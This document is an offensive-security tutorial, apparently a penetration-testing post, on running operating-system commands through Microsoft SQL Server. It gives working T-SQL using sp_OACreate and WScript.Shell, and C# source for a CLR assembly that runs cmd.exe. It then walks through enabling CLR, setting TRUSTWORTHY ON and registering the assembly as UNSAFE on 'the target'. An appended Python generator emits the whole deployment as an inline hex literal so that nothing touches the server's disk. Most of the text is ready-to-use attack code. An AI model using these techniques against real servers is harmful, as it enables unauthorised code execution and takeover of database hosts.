Executing commands via COM

(The Ole Automation Procedures component must be enabled.) sp_OACreate instantiates the WScript.Shell COM object by its CLSID, sp_OAMethod calls its Exec method with the command line, and the command's standard output is read back through the StdOut text stream:

declare @luan int, @exec int, @text int, @str varchar(8000);
exec sp_oacreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}', @luan output;   -- CLSID of WScript.Shell
exec sp_oamethod @luan, 'exec', @exec output, 'C:\Windows\System32\cmd.exe /c whoami';
exec sp_oamethod @exec, 'StdOut', @text out;      -- WshExec.StdOut (a TextStream)
exec sp_oamethod @text, 'readall', @str out;      -- TextStream.ReadAll; output is cut at 8000 chars by the varchar(8000) variable
select @str;
If Ole Automation Procedures is not enabled, it can be turned on with the following (requires the ALTER SETTINGS permission, i.e. sysadmin or serveradmin):

sp_configure 'show advanced options', 1;
GO
RECONFIGURE;
GO
sp_configure 'Ole Automation Procedures', 1;
GO
RECONFIGURE;
GO
Language: C#
Create a class library project in Visual Studio. Target the .NET Framework: SQL Server hosts only the Framework CLR, so a .NET Core / .NET 5+ build will not load as a SQL CLR assembly.

using System;
using System.Diagnostics;

namespace shellexec
{
    public class exec
    {
        // Runs a command line through cmd.exe and returns its standard output.
        public static string cmd(string command)
        {
            Process pro = new Process();
            pro.StartInfo.FileName = "cmd.exe";
            pro.StartInfo.UseShellExecute = false;        // required for stream redirection
            pro.StartInfo.RedirectStandardError = true;   // standard error
            pro.StartInfo.RedirectStandardInput = true;   // standard input
            pro.StartInfo.RedirectStandardOutput = true;  // standard output
            pro.StartInfo.CreateNoWindow = true;          // do not open a new window for the process
            pro.Start();
            pro.StandardInput.AutoFlush = true;           // flush the buffer automatically
            pro.StandardInput.WriteLine(command + "&&exit"); // write the command, then make cmd exit
            pro.StandardInput.Close();                    // send EOF so cmd also exits if the command fails
            string output = pro.StandardOutput.ReadToEnd(); // read the execution result
            pro.WaitForExit();                            // wait for the process to finish
            pro.Close();
            return output;
        }
    }
}
Once the DLL is built, get it onto the target either by embedding its bytes in the CREATE ASSEMBLY statement as a hex literal (FROM 0x4D5A...), or by uploading the file through a shell you already have. Then build the CLR objects in the following order.
1. CLR integration must be enabled on the target instance ('clr enabled' is not an advanced option, so 'show advanced options' is not needed):
exec sp_configure 'clr enabled', 1;  -- enable CLR in SQL Server
reconfigure;
go
2. The target database's TRUSTWORTHY property must be ON (an UNSAFE assembly is refused otherwise unless it is signed with a certificate or asymmetric key whose login holds UNSAFE ASSEMBLY; on SQL Server 2017+ sp_add_trusted_assembly is the documented alternative). Enable it with:
ALTER DATABASE [<database name>] SET TRUSTWORTHY ON
3. Register the DLL in the database (the path is resolved by the SQL Server service account on the server, not by the client; PERMISSION_SET can also be given here instead of in step 5):
CREATE ASSEMBLY MySqlCLR FROM '<path to dll>'  -- MySqlCLR is the name the imported assembly is referred to by afterwards
4. Create the function
(Declare the parameters to match the types of the C# method's signature; if the method returns string, declare RETURNS [nvarchar](max) so the output is not truncated. EXTERNAL NAME then points at the assembly name, the namespace-qualified class, and the method.)
CREATE FUNCTION [dbo].[cmd2]
(
    @cmd AS NVARCHAR(max)
)
RETURNS [nvarchar](max) WITH EXECUTE AS CALLER
AS
EXTERNAL NAME [MySqlCLR].[shellexec.exec].cmd  -- shellexec is the namespace, exec the class, cmd the method name
GO
5. The assembly's permission set must be UNSAFE (EXTERNAL_ACCESS is not sufficient for System.Diagnostics.Process); otherwise the function fails with a security exception when it is invoked:
ALTER ASSEMBLY [MySqlCLR]
WITH PERMISSION_SET = UNSAFE
6. Call the function (the command runs as the SQL Server service account):
select [dbo].[cmd2]('whoami')
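The "hex method" mentioned above is not shown on the page, so here is an added example (not code from the original post) that ties steps 1 to 5 together: it reads the compiled DLL as bytes, emits it as a varbinary literal inside CREATE ASSEMBLY so nothing has to be written to the server's disk, sets PERMISSION_SET = UNSAFE at creation time, and optionally registers the assembly hash with sp_add_trusted_assembly for SQL Server 2017+. Object names default to the ones used above (MySqlCLR, dbo.cmd2, shellexec.exec.cmd); the SAMPLE_DLL bytes are constructed for the demonstration and are not a real assembly, and the cleanup script is an assumption about what a practitioner wants to undo afterwards.

```python
# Added example: generate the T-SQL that deploys a CLR command-execution assembly
# from its raw bytes. Not part of the original page; names are the page's defaults.
import hashlib


def to_hex_literal(data: bytes) -> str:
    """Encode raw bytes as a T-SQL varbinary literal, e.g. b'MZ' -> '0x4D5A'."""
    return "0x" + data.hex().upper()


def quote_ident(name: str) -> str:
    """Bracket-quote a T-SQL identifier; a ']' inside the name is doubled."""
    return "[" + name.replace("]", "]]") + "]"


def sha512_literal(data: bytes) -> str:
    """SHA-512 of the assembly as the varbinary(64) literal sp_add_trusted_assembly takes."""
    return "0x" + hashlib.sha512(data).hexdigest().upper()


def build_deploy_script(dll_bytes: bytes, database: str, assembly: str = "MySqlCLR",
                        function: str = "cmd2", class_name: str = "shellexec.exec",
                        method: str = "cmd", trusted_assembly: bool = False) -> str:
    """Return the T-SQL for steps 1-5 as one script (PERMISSION_SET given at CREATE time).

    With trusted_assembly=True the assembly's SHA-512 is also whitelisted via
    sp_add_trusted_assembly (SQL Server 2017+), the documented alternative to
    relying on TRUSTWORTHY ON when 'clr strict security' is enforced.
    """
    if dll_bytes[:2] != b"MZ":
        raise ValueError("not a PE file: a .NET assembly must start with the MZ header")
    db, asm = quote_ident(database), quote_ident(assembly)
    lines = [
        f"USE {db};",
        "GO",
        "-- step 1: CLR integration ('clr enabled' is not an advanced option)",
        "EXEC sp_configure 'clr enabled', 1;",
        "RECONFIGURE;",
        "GO",
        "-- step 2: allow UNSAFE assemblies in this database",
        f"ALTER DATABASE {db} SET TRUSTWORTHY ON;",
        "GO",
    ]
    if trusted_assembly:
        lines += [
            "-- optional (2017+): whitelist the assembly by SHA-512 hash",
            f"EXEC sp_add_trusted_assembly {sha512_literal(dll_bytes)}, N'{assembly.replace(chr(39), chr(39) * 2)}';",
            "GO",
        ]
    lines += [
        "-- steps 3 and 5: register the DLL from its bytes with the permission set it needs",
        f"CREATE ASSEMBLY {asm} FROM {to_hex_literal(dll_bytes)} WITH PERMISSION_SET = UNSAFE;",
        "GO",
        "-- step 4: expose the public static method as a scalar function",
        f"CREATE FUNCTION {quote_ident('dbo')}.{quote_ident(function)} (@cmd NVARCHAR(MAX))",
        "RETURNS NVARCHAR(MAX) WITH EXECUTE AS CALLER",
        f"AS EXTERNAL NAME {asm}.{quote_ident(class_name)}.{quote_ident(method)};",
        "GO",
    ]
    return "\n".join(lines) + "\n"


def build_cleanup_script(database: str, assembly: str = "MySqlCLR", function: str = "cmd2") -> str:
    """Reverse the deployment: drop the function and assembly, restore TRUSTWORTHY OFF."""
    db = quote_ident(database)
    return "\n".join([
        f"USE {db};",
        "GO",
        f"DROP FUNCTION {quote_ident('dbo')}.{quote_ident(function)};",
        f"DROP ASSEMBLY {quote_ident(assembly)};",
        "GO",
        f"ALTER DATABASE {db} SET TRUSTWORTHY OFF;",
        "GO",
    ]) + "\n"


# Constructed stand-in for a compiled DLL: only the MZ header is realistic.
# For a real run: dll_bytes = open("shellexec.dll", "rb").read()
SAMPLE_DLL = b"MZ\x90\x00" + bytes(12)

if __name__ == "__main__":
    print(build_deploy_script(SAMPLE_DLL, "master", trusted_assembly=True))
    print(build_cleanup_script("master"))
```

The generated script is executed with sqlcmd or SSMS against the target as a sysadmin; a real DLL produces a hex literal of a few hundred kilobytes, which CREATE ASSEMBLY accepts inline. Keeping the cleanup script alongside the deployment one avoids leaving an UNSAFE assembly and a TRUSTWORTHY database behind after the engagement.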